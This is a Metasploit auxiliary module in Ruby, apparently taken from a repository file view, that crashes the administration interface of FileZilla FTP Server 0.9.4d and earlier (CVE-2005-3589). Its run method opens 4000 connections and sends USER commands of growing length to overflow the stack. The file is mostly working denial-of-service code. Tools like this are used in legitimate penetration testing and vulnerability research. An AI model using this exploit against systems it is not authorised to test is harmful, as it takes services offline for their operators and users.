metasploit-framework/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb

48 lines
1.3 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-07 08:56:58 +00:00
class Metasploit < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP
Server Administration Interface in versions 0.9.4d and earlier.
By sending a procession of excessively long USER commands to the FTP
Server, the Administration Interface (FileZilla Server Interface.exe)
when running, will overwrite the stack with our string and generate an
exception. The FileZilla FTP Server itself will continue functioning.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '15346' ],
[ 'CVE', '2005-3589' ],
[ 'EDB', '1336' ],
[ 'OSVDB', '20817' ]
],
'DisclosureDate' => 'Nov 07 2005'))
end
def run
print_status("Sending 4000 packets, this may take a while.")
4000.times do |x|
connect
sock.put("USER #{"A" * x}\r\n")
disconnect
end
end
2012-03-18 05:07:27 +00:00
end